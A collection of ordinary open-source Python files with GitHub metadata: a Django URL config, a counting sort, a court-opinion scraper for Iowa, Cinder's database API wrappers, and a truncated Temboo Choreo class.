"line_count": 5,
"max_line_length": 103,
"avg_line_length": 45.2,
"alnum_prop": 0.6150442477876106,
"repo_name": "jeff-alves/Tera",
"id": "dc0ca282ac3062f3bffbe8a4ae47483e7a8a62d4",
"size": "226",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/message/unused/S_USER_LEVELUP.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "113659"
}
],
"symlink_target": ""
} |
__author__ = "Vivek Dhayaal"
__copyright__ = "Copyright 2014, Reliance Jio Infocomm Ltd."
from django.conf.urls import patterns # noqa
from django.conf.urls import url # noqa
from horizon_jiocloud.change_phone import views
urlpatterns = patterns('',
url(r'^$', views.PhoneView.as_view(), name='index'),
url(r'^sendSms/', views.sendSms, name='sendSms'))
| {
"content_hash": "fac484ec92b1ceb12848a63d58bd0e59",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 62,
"avg_line_length": 31.166666666666668,
"alnum_prop": 0.6844919786096256,
"repo_name": "JioCloud/horizon",
"id": "75c2a4ca54132edfe47df2e09f73a620edf95339",
"size": "419",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "horizon_jiocloud/change_phone/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "296932"
},
{
"name": "JavaScript",
"bytes": "713370"
},
{
"name": "Python",
"bytes": "3614755"
},
{
"name": "Shell",
"bytes": "15387"
}
],
"symlink_target": ""
} |
'''
Space Efficient Counting sort version. Sorts using regular counting sort
algorithm except for the fact there is wrapping and unwrapping of vlaues
in the array to make space efficient frequency Table in the counting sort
Time Complexity = O(N)
Space Complexity = O(Max - Min)
'''
def unWrapIndex(i,minVal):
return i + minVal
def wrapIndex(i,minVal):
return i - minVal
def boundCountingSort(a):
XMin = min(a)
XMax = max(a)
b = [0] * (XMax - XMin + 1)
for i in a:
index = wrapIndex(i,XMin)
b[index] += 1
sortedArr = []
for i in range(len(b)):
for j in range(b[i]):
element = unWrapIndex(i,XMin)
sortedArr.append(element)
return b,sortedArr
| {
"content_hash": "5de8f20eec556cb0ba871e433aa19fc2",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 77,
"avg_line_length": 29.076923076923077,
"alnum_prop": 0.6177248677248677,
"repo_name": "tejasnikumbh/Algorithms",
"id": "6376f2ab30f56b9f4aae3677c40176819c4a497b",
"size": "756",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "genericCode/sortingAlgorithms/spaceEfficientCountingSort.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C++",
"bytes": "4292"
},
{
"name": "Java",
"bytes": "9455"
},
{
"name": "Python",
"bytes": "138746"
}
],
"symlink_target": ""
} |
from juriscraper.AbstractSite import logger
from juriscraper.lib.string_utils import convert_date_string
from juriscraper.OpinionSite import OpinionSite
class Site(OpinionSite):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.court_id = self.__module__
self.cases = []
self.archive = False
self.back_scrape_iterable = [
"placeholder"
] # this array can't be empty
self.url = "https://www.iowacourts.gov/iowa-courts/supreme-court/supreme-court-opinions/"
def _download(self, request_dict={}):
html = super()._download(request_dict)
self.extract_cases(html)
if self.test_mode_enabled() or self.archive:
return html
# Walk over pagination "Next" page(s), if present
proceed = True
while proceed:
next_page_url = self.extract_next_page_url(html)
if next_page_url:
logger.info(f"Scraping next page: {next_page_url}")
html = self._get_html_tree_by_url(next_page_url)
self.extract_cases(html)
else:
proceed = False
def _get_case_names(self):
return [case["name"] for case in self.cases]
def _get_download_urls(self):
return [case["url"] for case in self.cases]
def _get_case_dates(self):
return [convert_date_string(case["date"]) for case in self.cases]
def _get_precedential_statuses(self):
return ["Published"] * len(self.case_dates)
def _get_docket_numbers(self):
return [case["docket"] for case in self.cases]
def _download_backwards(self, _):
"""Walk over all "Archive" links on Archive page,
extract cases dictionaries, and add to self.cases
"""
self.archive = True
self.url = f"{self.url}opinions-archive/"
landing_page_html = self._download()
path = '//div[@class="main-content-wrapper"]//a[contains(./text(), "Opinions Archive")]/@href'
for archive_page_url in landing_page_html.xpath(path):
logger.info(f"Back scraping archive page: {archive_page_url}")
archive_page_html = self._get_html_tree_by_url(archive_page_url)
self.extract_archive_cases(archive_page_html)
def extract_cases(self, html):
"""Extract case dictionaries from "Recent" html page
and add them to self.cases
"""
case_substring = "Case No."
case_elements = html.xpath(f'//h3[contains(., "{case_substring}")]')
for case_element in case_elements:
text = case_element.text_content()
parts = text.split(":")
docket = parts[0].replace(case_substring, "").strip()
name = parts[1].strip()
date_text = case_element.xpath("./following::p[1]")[
0
].text_content()
date_string = date_text.replace("Filed", "")
url = case_element.xpath("./following::p[2]//a/@href")[0]
self.cases.append(
{
"name": name,
"docket": docket,
"date": date_string,
"url": url,
}
)
def extract_archive_cases(self, html):
"""Extract case dictionaries from "Archive" html page
and add them to self.cases
"""
path_date = '//div[@class="cms_category_icon_title_row"]'
for date_header in html.xpath(path_date):
text = date_header.text_content()
date_string = text.replace("- DELETE", "")
path_cases = './following::div[@class="cms_items"][1]/div[@class="cms_item"]'
for case_container in date_header.xpath(path_cases):
docket_element = case_container.xpath(
'./div[@class="cms_item_icon_title_row"]'
)[0]
self.cases.append(
{
"date": date_string,
"url": docket_element.xpath(".//a/@href")[0],
"docket": docket_element.text_content().strip(),
"name": case_container.xpath(
'./div[@class="cms_item_description"]'
)[0]
.text_content()
.strip(),
}
)
def extract_next_page_url(self, html):
"""Return the href url from "Next" pagination element
if it exists, otherwise return False.
"""
path = '//div[contains(./@class, "pagination-next-page")]//a/@href'
elements = html.xpath(path)
return elements[0] if elements else False
| {
"content_hash": "e09c0294fa409a01977bb36eaed1d6d6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 102,
"avg_line_length": 39.95798319327731,
"alnum_prop": 0.5383806519453207,
"repo_name": "freelawproject/juriscraper",
"id": "3405e90074effa6df39a4464cace1b6c85e7b5ea",
"size": "4830",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "juriscraper/opinions/united_states/state/iowa.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "63242956"
},
{
"name": "Jinja",
"bytes": "2201"
},
{
"name": "Makefile",
"bytes": "75"
},
{
"name": "Python",
"bytes": "1059228"
}
],
"symlink_target": ""
} |
"""Defines interface for DB access.
Functions in this module are imported into the cinder.db namespace. Call these
functions from cinder.db namespace, not the cinder.db.api namespace.
All functions in this module return objects that implement a dictionary-like
interface. Currently, many of these objects are sqlalchemy objects that
implement a dictionary interface. However, a future goal is to have all of
these objects be simple dictionaries.
**Related Flags**
:connection: string specifying the sqlalchemy connection to use, like:
`sqlite:///var/lib/cinder/cinder.sqlite`.
:enable_new_services: when adding a new service to the database, is it in the
pool of available hardware (Default: True)
"""
from oslo_config import cfg
from oslo_db import concurrency as db_concurrency
from oslo_db import options as db_options
db_opts = [
cfg.BoolOpt('enable_new_services',
default=True,
help='Services to be added to the available pool on create'),
cfg.StrOpt('volume_name_template',
default='volume-%s',
help='Template string to be used to generate volume names'),
cfg.StrOpt('snapshot_name_template',
default='snapshot-%s',
help='Template string to be used to generate snapshot names'),
cfg.StrOpt('backup_name_template',
default='backup-%s',
help='Template string to be used to generate backup names'), ]
CONF = cfg.CONF
CONF.register_opts(db_opts)
db_options.set_defaults(CONF)
CONF.set_default('sqlite_db', 'cinder.sqlite', group='database')
_BACKEND_MAPPING = {'sqlalchemy': 'cinder.db.sqlalchemy.api'}
IMPL = db_concurrency.TpoolDbapiWrapper(CONF, _BACKEND_MAPPING)
###################
def dispose_engine():
"""Force the engine to establish new connections."""
# FIXME(jdg): When using sqlite if we do the dispose
# we seem to lose our DB here. Adding this check
# means we don't do the dispose, but we keep our sqlite DB
# This likely isn't the best way to handle this
if 'sqlite' not in IMPL.get_engine().name:
return IMPL.dispose_engine()
else:
return
###################
def service_destroy(context, service_id):
"""Destroy the service or raise if it does not exist."""
return IMPL.service_destroy(context, service_id)
def service_get(context, service_id):
"""Get a service or raise if it does not exist."""
return IMPL.service_get(context, service_id)
def service_get_by_host_and_topic(context, host, topic):
"""Get a service by host it's on and topic it listens to."""
return IMPL.service_get_by_host_and_topic(context, host, topic)
def service_get_all(context, disabled=None):
"""Get all services."""
return IMPL.service_get_all(context, disabled)
def service_get_all_by_topic(context, topic, disabled=None):
"""Get all services for a given topic."""
return IMPL.service_get_all_by_topic(context, topic, disabled=disabled)
def service_get_by_args(context, host, binary):
"""Get the state of an service by node name and binary."""
return IMPL.service_get_by_args(context, host, binary)
def service_create(context, values):
"""Create a service from the values dictionary."""
return IMPL.service_create(context, values)
def service_update(context, service_id, values):
"""Set the given properties on an service and update it.
Raises NotFound if service does not exist.
"""
return IMPL.service_update(context, service_id, values)
###################
def iscsi_target_count_by_host(context, host):
"""Return count of export devices."""
return IMPL.iscsi_target_count_by_host(context, host)
def iscsi_target_create_safe(context, values):
"""Create an iscsi_target from the values dictionary.
The device is not returned. If the create violates the unique
constraints because the iscsi_target and host already exist,
no exception is raised.
"""
return IMPL.iscsi_target_create_safe(context, values)
###############
def volume_attach(context, values):
"""Attach a volume."""
return IMPL.volume_attach(context, values)
def volume_attached(context, volume_id, instance_id, host_name, mountpoint,
attach_mode='rw'):
"""Ensure that a volume is set as attached."""
return IMPL.volume_attached(context, volume_id, instance_id, host_name,
mountpoint, attach_mode)
def volume_create(context, values):
"""Create a volume from the values dictionary."""
return IMPL.volume_create(context, values)
def volume_data_get_for_host(context, host, count_only=False):
"""Get (volume_count, gigabytes) for project."""
return IMPL.volume_data_get_for_host(context,
host,
count_only)
def volume_data_get_for_project(context, project_id):
"""Get (volume_count, gigabytes) for project."""
return IMPL.volume_data_get_for_project(context, project_id)
def finish_volume_migration(context, src_vol_id, dest_vol_id):
"""Perform database updates upon completion of volume migration."""
return IMPL.finish_volume_migration(context, src_vol_id, dest_vol_id)
def volume_destroy(context, volume_id):
"""Destroy the volume or raise if it does not exist."""
return IMPL.volume_destroy(context, volume_id)
def volume_detached(context, volume_id, attachment_id):
"""Ensure that a volume is set as detached."""
return IMPL.volume_detached(context, volume_id, attachment_id)
def volume_get(context, volume_id):
"""Get a volume or raise if it does not exist."""
return IMPL.volume_get(context, volume_id)
def volume_get_all(context, marker, limit, sort_keys=None, sort_dirs=None,
filters=None):
"""Get all volumes."""
return IMPL.volume_get_all(context, marker, limit, sort_keys=sort_keys,
sort_dirs=sort_dirs, filters=filters)
def volume_get_all_by_host(context, host, filters=None):
"""Get all volumes belonging to a host."""
return IMPL.volume_get_all_by_host(context, host, filters=filters)
def volume_get_all_by_group(context, group_id, filters=None):
"""Get all volumes belonging to a consistency group."""
return IMPL.volume_get_all_by_group(context, group_id, filters=filters)
def volume_get_all_by_project(context, project_id, marker, limit,
sort_keys=None, sort_dirs=None, filters=None):
"""Get all volumes belonging to a project."""
return IMPL.volume_get_all_by_project(context, project_id, marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
def volume_get_iscsi_target_num(context, volume_id):
"""Get the target num (tid) allocated to the volume."""
return IMPL.volume_get_iscsi_target_num(context, volume_id)
def volume_update(context, volume_id, values):
"""Set the given properties on an volume and update it.
Raises NotFound if volume does not exist.
"""
return IMPL.volume_update(context, volume_id, values)
def volume_attachment_update(context, attachment_id, values):
return IMPL.volume_attachment_update(context, attachment_id, values)
def volume_attachment_get(context, attachment_id, session=None):
return IMPL.volume_attachment_get(context, attachment_id, session)
def volume_attachment_get_used_by_volume_id(context, volume_id):
return IMPL.volume_attachment_get_used_by_volume_id(context, volume_id)
def volume_attachment_get_by_host(context, volume_id, host):
return IMPL.volume_attachment_get_by_host(context, volume_id, host)
def volume_attachment_get_by_instance_uuid(context, volume_id, instance_uuid):
return IMPL.volume_attachment_get_by_instance_uuid(context, volume_id,
instance_uuid)
def volume_update_status_based_on_attachment(context, volume_id):
"""Update volume status according to attached instance id"""
return IMPL.volume_update_status_based_on_attachment(context, volume_id)
####################
def snapshot_create(context, values):
"""Create a snapshot from the values dictionary."""
return IMPL.snapshot_create(context, values)
def snapshot_destroy(context, snapshot_id):
"""Destroy the snapshot or raise if it does not exist."""
return IMPL.snapshot_destroy(context, snapshot_id)
def snapshot_get(context, snapshot_id):
"""Get a snapshot or raise if it does not exist."""
return IMPL.snapshot_get(context, snapshot_id)
def snapshot_get_all(context):
"""Get all snapshots."""
return IMPL.snapshot_get_all(context)
def snapshot_get_all_by_project(context, project_id):
"""Get all snapshots belonging to a project."""
return IMPL.snapshot_get_all_by_project(context, project_id)
def snapshot_get_by_host(context, host, filters=None):
"""Get all snapshots belonging to a host.
:param host: Include include snapshots only for specified host.
:param filters: Filters for the query in the form of key/value.
"""
return IMPL.snapshot_get_by_host(context, host, filters)
def snapshot_get_all_for_cgsnapshot(context, project_id):
"""Get all snapshots belonging to a cgsnapshot."""
return IMPL.snapshot_get_all_for_cgsnapshot(context, project_id)
def snapshot_get_all_for_volume(context, volume_id):
"""Get all snapshots for a volume."""
return IMPL.snapshot_get_all_for_volume(context, volume_id)
def snapshot_update(context, snapshot_id, values):
"""Set the given properties on an snapshot and update it.
Raises NotFound if snapshot does not exist.
"""
return IMPL.snapshot_update(context, snapshot_id, values)
def snapshot_data_get_for_project(context, project_id, volume_type_id=None):
"""Get count and gigabytes used for snapshots for specified project."""
return IMPL.snapshot_data_get_for_project(context,
project_id,
volume_type_id)
def snapshot_get_active_by_window(context, begin, end=None, project_id=None):
"""Get all the snapshots inside the window.
Specifying a project_id will filter for a certain project.
"""
return IMPL.snapshot_get_active_by_window(context, begin, end, project_id)
####################
def snapshot_metadata_get(context, snapshot_id):
"""Get all metadata for a snapshot."""
return IMPL.snapshot_metadata_get(context, snapshot_id)
def snapshot_metadata_delete(context, snapshot_id, key):
"""Delete the given metadata item."""
return IMPL.snapshot_metadata_delete(context, snapshot_id, key)
def snapshot_metadata_update(context, snapshot_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.snapshot_metadata_update(context, snapshot_id,
metadata, delete)
####################
def volume_metadata_get(context, volume_id):
"""Get all metadata for a volume."""
return IMPL.volume_metadata_get(context, volume_id)
def volume_metadata_delete(context, volume_id, key):
"""Delete the given metadata item."""
return IMPL.volume_metadata_delete(context, volume_id, key)
def volume_metadata_update(context, volume_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.volume_metadata_update(context, volume_id, metadata, delete)
##################
def volume_admin_metadata_get(context, volume_id):
"""Get all administration metadata for a volume."""
return IMPL.volume_admin_metadata_get(context, volume_id)
def volume_admin_metadata_delete(context, volume_id, key):
"""Delete the given metadata item."""
return IMPL.volume_admin_metadata_delete(context, volume_id, key)
def volume_admin_metadata_update(context, volume_id, metadata, delete):
"""Update metadata if it exists, otherwise create it."""
return IMPL.volume_admin_metadata_update(context, volume_id, metadata,
delete)
##################
def volume_type_create(context, values, projects=None):
"""Create a new volume type."""
return IMPL.volume_type_create(context, values, projects)
def volume_type_update(context, volume_type_id, values):
return IMPL.volume_type_update(context, volume_type_id, values)
def volume_type_get_all(context, inactive=False, filters=None):
"""Get all volume types.
:param context: context to query under
:param inactive: Include inactive volume types to the result set
:param filters: Filters for the query in the form of key/value.
:is_public: Filter volume types based on visibility:
* **True**: List public volume types only
* **False**: List private volume types only
* **None**: List both public and private volume types
:returns: list of matching volume types
"""
return IMPL.volume_type_get_all(context, inactive, filters)
def volume_type_get(context, id, inactive=False, expected_fields=None):
"""Get volume type by id.
:param context: context to query under
:param id: Volume type id to get.
:param inactive: Consider inactive volume types when searching
:param expected_fields: Return those additional fields.
Supported fields are: projects.
:returns: volume type
"""
return IMPL.volume_type_get(context, id, inactive, expected_fields)
def volume_type_get_by_name(context, name):
"""Get volume type by name."""
return IMPL.volume_type_get_by_name(context, name)
def volume_types_get_by_name_or_id(context, volume_type_list):
"""Get volume types by name or id."""
return IMPL.volume_types_get_by_name_or_id(context, volume_type_list)
def volume_type_qos_associations_get(context, qos_specs_id, inactive=False):
"""Get volume types that are associated with specific qos specs."""
return IMPL.volume_type_qos_associations_get(context,
qos_specs_id,
inactive)
def volume_type_qos_associate(context, type_id, qos_specs_id):
"""Associate a volume type with specific qos specs."""
return IMPL.volume_type_qos_associate(context, type_id, qos_specs_id)
def volume_type_qos_disassociate(context, qos_specs_id, type_id):
"""Disassociate a volume type from specific qos specs."""
return IMPL.volume_type_qos_disassociate(context, qos_specs_id, type_id)
def volume_type_qos_disassociate_all(context, qos_specs_id):
"""Disassociate all volume types from specific qos specs."""
return IMPL.volume_type_qos_disassociate_all(context,
qos_specs_id)
def volume_type_qos_specs_get(context, type_id):
"""Get all qos specs for given volume type."""
return IMPL.volume_type_qos_specs_get(context, type_id)
def volume_type_destroy(context, id):
"""Delete a volume type."""
return IMPL.volume_type_destroy(context, id)
def volume_get_active_by_window(context, begin, end=None, project_id=None):
"""Get all the volumes inside the window.
Specifying a project_id will filter for a certain project.
"""
return IMPL.volume_get_active_by_window(context, begin, end, project_id)
def volume_type_access_get_all(context, type_id):
"""Get all volume type access of a volume type."""
return IMPL.volume_type_access_get_all(context, type_id)
def volume_type_access_add(context, type_id, project_id):
"""Add volume type access for project."""
return IMPL.volume_type_access_add(context, type_id, project_id)
def volume_type_access_remove(context, type_id, project_id):
"""Remove volume type access for project."""
return IMPL.volume_type_access_remove(context, type_id, project_id)
####################
def volume_type_extra_specs_get(context, volume_type_id):
"""Get all extra specs for a volume type."""
return IMPL.volume_type_extra_specs_get(context, volume_type_id)
def volume_type_extra_specs_delete(context, volume_type_id, key):
"""Delete the given extra specs item."""
return IMPL.volume_type_extra_specs_delete(context, volume_type_id, key)
def volume_type_extra_specs_update_or_create(context,
volume_type_id,
extra_specs):
"""Create or update volume type extra specs. This adds or modifies the
key/value pairs specified in the extra specs dict argument
"""
return IMPL.volume_type_extra_specs_update_or_create(context,
volume_type_id,
extra_specs)
###################
def volume_type_encryption_get(context, volume_type_id, session=None):
return IMPL.volume_type_encryption_get(context, volume_type_id, session)
def volume_type_encryption_delete(context, volume_type_id):
return IMPL.volume_type_encryption_delete(context, volume_type_id)
def volume_type_encryption_create(context, volume_type_id, encryption_specs):
return IMPL.volume_type_encryption_create(context, volume_type_id,
encryption_specs)
def volume_type_encryption_update(context, volume_type_id, encryption_specs):
return IMPL.volume_type_encryption_update(context, volume_type_id,
encryption_specs)
def volume_type_encryption_volume_get(context, volume_type_id, session=None):
return IMPL.volume_type_encryption_volume_get(context, volume_type_id,
session)
def volume_encryption_metadata_get(context, volume_id, session=None):
return IMPL.volume_encryption_metadata_get(context, volume_id, session)
###################
def qos_specs_create(context, values):
"""Create a qos_specs."""
return IMPL.qos_specs_create(context, values)
def qos_specs_get(context, qos_specs_id):
"""Get all specification for a given qos_specs."""
return IMPL.qos_specs_get(context, qos_specs_id)
def qos_specs_get_all(context, inactive=False, filters=None):
"""Get all qos_specs."""
return IMPL.qos_specs_get_all(context, inactive, filters)
def qos_specs_get_by_name(context, name):
"""Get all specification for a given qos_specs."""
return IMPL.qos_specs_get_by_name(context, name)
def qos_specs_associations_get(context, qos_specs_id):
"""Get all associated volume types for a given qos_specs."""
return IMPL.qos_specs_associations_get(context, qos_specs_id)
def qos_specs_associate(context, qos_specs_id, type_id):
"""Associate qos_specs from volume type."""
return IMPL.qos_specs_associate(context, qos_specs_id, type_id)
def qos_specs_disassociate(context, qos_specs_id, type_id):
"""Disassociate qos_specs from volume type."""
return IMPL.qos_specs_disassociate(context, qos_specs_id, type_id)
def qos_specs_disassociate_all(context, qos_specs_id):
"""Disassociate qos_specs from all entities."""
return IMPL.qos_specs_disassociate_all(context, qos_specs_id)
def qos_specs_delete(context, qos_specs_id):
"""Delete the qos_specs."""
return IMPL.qos_specs_delete(context, qos_specs_id)
def qos_specs_item_delete(context, qos_specs_id, key):
"""Delete specified key in the qos_specs."""
return IMPL.qos_specs_item_delete(context, qos_specs_id, key)
def qos_specs_update(context, qos_specs_id, specs):
"""Update qos specs.
This adds or modifies the key/value pairs specified in the
specs dict argument for a given qos_specs.
"""
return IMPL.qos_specs_update(context, qos_specs_id, specs)
###################
def volume_glance_metadata_create(context, volume_id, key, value):
"""Update the Glance metadata for the specified volume."""
return IMPL.volume_glance_metadata_create(context,
volume_id,
key,
value)
def volume_glance_metadata_get_all(context):
"""Return the glance metadata for all volumes."""
return IMPL.volume_glance_metadata_get_all(context)
def volume_glance_metadata_get(context, volume_id):
"""Return the glance metadata for a volume."""
return IMPL.volume_glance_metadata_get(context, volume_id)
def volume_snapshot_glance_metadata_get(context, snapshot_id):
"""Return the Glance metadata for the specified snapshot."""
return IMPL.volume_snapshot_glance_metadata_get(context, snapshot_id)
def volume_glance_metadata_copy_to_snapshot(context, snapshot_id, volume_id):
"""Update the Glance metadata for a snapshot.
This will copy all of the key:value pairs from the originating volume,
to ensure that a volume created from the snapshot will retain the
original metadata.
"""
return IMPL.volume_glance_metadata_copy_to_snapshot(context, snapshot_id,
volume_id)
def volume_glance_metadata_copy_to_volume(context, volume_id, snapshot_id):
"""Update the Glance metadata from a volume (created from a snapshot).
This will copy all of the key:value pairs from the originating snapshot,
to ensure that the Glance metadata from the original volume is retained.
"""
return IMPL.volume_glance_metadata_copy_to_volume(context, volume_id,
snapshot_id)
def volume_glance_metadata_delete_by_volume(context, volume_id):
"""Delete the glance metadata for a volume."""
return IMPL.volume_glance_metadata_delete_by_volume(context, volume_id)
def volume_glance_metadata_delete_by_snapshot(context, snapshot_id):
"""Delete the glance metadata for a snapshot."""
return IMPL.volume_glance_metadata_delete_by_snapshot(context, snapshot_id)
def volume_glance_metadata_copy_from_volume_to_volume(context,
src_volume_id,
volume_id):
"""Update the Glance metadata for a volume by copying all of the key:value
pairs from the originating volume.
This is so that a volume created from the volume (clone) will retain the
original metadata.
"""
return IMPL.volume_glance_metadata_copy_from_volume_to_volume(
context,
src_volume_id,
volume_id)
###################
def quota_create(context, project_id, resource, limit):
"""Create a quota for the given project and resource."""
return IMPL.quota_create(context, project_id, resource, limit)
def quota_get(context, project_id, resource):
"""Retrieve a quota or raise if it does not exist."""
return IMPL.quota_get(context, project_id, resource)
def quota_get_all_by_project(context, project_id):
"""Retrieve all quotas associated with a given project."""
return IMPL.quota_get_all_by_project(context, project_id)
def quota_update(context, project_id, resource, limit):
"""Update a quota or raise if it does not exist."""
return IMPL.quota_update(context, project_id, resource, limit)
def quota_destroy(context, project_id, resource):
"""Destroy the quota or raise if it does not exist."""
return IMPL.quota_destroy(context, project_id, resource)
###################
def quota_class_create(context, class_name, resource, limit):
"""Create a quota class for the given name and resource."""
return IMPL.quota_class_create(context, class_name, resource, limit)
def quota_class_get(context, class_name, resource):
"""Retrieve a quota class or raise if it does not exist."""
return IMPL.quota_class_get(context, class_name, resource)
def quota_class_get_default(context):
"""Retrieve all default quotas."""
return IMPL.quota_class_get_default(context)
def quota_class_get_all_by_name(context, class_name):
"""Retrieve all quotas associated with a given quota class."""
return IMPL.quota_class_get_all_by_name(context, class_name)
def quota_class_update(context, class_name, resource, limit):
"""Update a quota class or raise if it does not exist."""
return IMPL.quota_class_update(context, class_name, resource, limit)
def quota_class_destroy(context, class_name, resource):
"""Destroy the quota class or raise if it does not exist."""
return IMPL.quota_class_destroy(context, class_name, resource)
def quota_class_destroy_all_by_name(context, class_name):
"""Destroy all quotas associated with a given quota class."""
return IMPL.quota_class_destroy_all_by_name(context, class_name)
###################
def quota_usage_get(context, project_id, resource):
"""Retrieve a quota usage or raise if it does not exist."""
return IMPL.quota_usage_get(context, project_id, resource)
def quota_usage_get_all_by_project(context, project_id):
"""Retrieve all usage associated with a given resource."""
return IMPL.quota_usage_get_all_by_project(context, project_id)
###################
def quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=None):
"""Check quotas and create appropriate reservations."""
return IMPL.quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=project_id)
def reservation_commit(context, reservations, project_id=None):
"""Commit quota reservations."""
return IMPL.reservation_commit(context, reservations,
project_id=project_id)
def reservation_rollback(context, reservations, project_id=None):
"""Roll back quota reservations."""
return IMPL.reservation_rollback(context, reservations,
project_id=project_id)
def quota_destroy_all_by_project(context, project_id):
"""Destroy all quotas associated with a given project."""
return IMPL.quota_destroy_all_by_project(context, project_id)
def reservation_expire(context):
"""Roll back any expired reservations."""
return IMPL.reservation_expire(context)
###################
def backup_get(context, backup_id):
"""Get a backup or raise if it does not exist."""
return IMPL.backup_get(context, backup_id)
def backup_get_all(context, filters=None):
"""Get all backups."""
return IMPL.backup_get_all(context, filters=filters)
def backup_get_all_by_host(context, host):
"""Get all backups belonging to a host."""
return IMPL.backup_get_all_by_host(context, host)
def backup_create(context, values):
"""Create a backup from the values dictionary."""
return IMPL.backup_create(context, values)
def backup_get_all_by_project(context, project_id, filters=None):
"""Get all backups belonging to a project."""
return IMPL.backup_get_all_by_project(context, project_id,
filters=filters)
def backup_get_all_by_volume(context, volume_id, filters=None):
"""Get all backups belonging to a volume."""
return IMPL.backup_get_all_by_volume(context, volume_id,
filters=filters)
def backup_update(context, backup_id, values):
"""Set the given properties on a backup and update it.
Raises NotFound if backup does not exist.
"""
return IMPL.backup_update(context, backup_id, values)
def backup_destroy(context, backup_id):
"""Destroy the backup or raise if it does not exist."""
return IMPL.backup_destroy(context, backup_id)
###################
def transfer_get(context, transfer_id):
"""Get a volume transfer record or raise if it does not exist."""
return IMPL.transfer_get(context, transfer_id)
def transfer_get_all(context):
"""Get all volume transfer records."""
return IMPL.transfer_get_all(context)
def transfer_get_all_by_project(context, project_id):
"""Get all volume transfer records for specified project."""
return IMPL.transfer_get_all_by_project(context, project_id)
def transfer_create(context, values):
"""Create an entry in the transfers table."""
return IMPL.transfer_create(context, values)
def transfer_destroy(context, transfer_id):
"""Destroy a record in the volume transfer table."""
return IMPL.transfer_destroy(context, transfer_id)
def transfer_accept(context, transfer_id, user_id, project_id):
"""Accept a volume transfer."""
return IMPL.transfer_accept(context, transfer_id, user_id, project_id)
###################
def consistencygroup_get(context, consistencygroup_id):
"""Get a consistencygroup or raise if it does not exist."""
return IMPL.consistencygroup_get(context, consistencygroup_id)
def consistencygroup_get_all(context):
"""Get all consistencygroups."""
return IMPL.consistencygroup_get_all(context)
def consistencygroup_create(context, values):
"""Create a consistencygroup from the values dictionary."""
return IMPL.consistencygroup_create(context, values)
def consistencygroup_get_all_by_project(context, project_id):
"""Get all consistencygroups belonging to a project."""
return IMPL.consistencygroup_get_all_by_project(context, project_id)
def consistencygroup_update(context, consistencygroup_id, values):
"""Set the given properties on a consistencygroup and update it.
Raises NotFound if consistencygroup does not exist.
"""
return IMPL.consistencygroup_update(context, consistencygroup_id, values)
def consistencygroup_destroy(context, consistencygroup_id):
"""Destroy the consistencygroup or raise if it does not exist."""
return IMPL.consistencygroup_destroy(context, consistencygroup_id)
###################
def cgsnapshot_get(context, cgsnapshot_id):
"""Get a cgsnapshot or raise if it does not exist."""
return IMPL.cgsnapshot_get(context, cgsnapshot_id)
def cgsnapshot_get_all(context):
"""Get all cgsnapshots."""
return IMPL.cgsnapshot_get_all(context)
def cgsnapshot_create(context, values):
"""Create a cgsnapshot from the values dictionary."""
return IMPL.cgsnapshot_create(context, values)
def cgsnapshot_get_all_by_group(context, group_id):
"""Get all cgsnapshots belonging to a consistency group."""
return IMPL.cgsnapshot_get_all_by_group(context, group_id)
def cgsnapshot_get_all_by_project(context, project_id):
"""Get all cgsnapshots belonging to a project."""
return IMPL.cgsnapshot_get_all_by_project(context, project_id)
def cgsnapshot_update(context, cgsnapshot_id, values):
"""Set the given properties on a cgsnapshot and update it.
Raises NotFound if cgsnapshot does not exist.
"""
return IMPL.cgsnapshot_update(context, cgsnapshot_id, values)
def cgsnapshot_destroy(context, cgsnapshot_id):
"""Destroy the cgsnapshot or raise if it does not exist."""
return IMPL.cgsnapshot_destroy(context, cgsnapshot_id)
def purge_deleted_rows(context, age_in_days):
"""Purge deleted rows older than given age from cinder tables
Raises InvalidParameterValue if age_in_days is incorrect.
:returns: number of deleted rows
"""
return IMPL.purge_deleted_rows(context, age_in_days=age_in_days)
###################
def driver_initiator_data_update(context, initiator, namespace, updates):
"""Create DriverPrivateData from the values dictionary."""
return IMPL.driver_initiator_data_update(context, initiator,
namespace, updates)
def driver_initiator_data_get(context, initiator, namespace):
"""Query for an DriverPrivateData that has the specified key"""
return IMPL.driver_initiator_data_get(context, initiator, namespace)
| {
"content_hash": "7bdab67aa5deb0e8484d43a58c2369e6",
"timestamp": "",
"source": "github",
"line_count": 967,
"max_line_length": 79,
"avg_line_length": 33.153050672182005,
"alnum_prop": 0.6721357497114695,
"repo_name": "yanheven/cinder",
"id": "f0726fea9d360c18d3ef7c8241e125e20f7b01ec",
"size": "32853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/db/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "2511"
},
{
"name": "Python",
"bytes": "10655225"
},
{
"name": "Shell",
"bytes": "8111"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetListsByEntity(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetListsByEntity Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetListsByEntity, self).__init__(temboo_session, '/Library/LittleSis/Entity/GetListsByEntity')
def new_input_set(self):
return GetListsByEntityInputSet()
def _make_result_set(self, result, path):
return GetListsByEntityResultSet(result, path)
def _make_execution(self, session, exec_id, path):
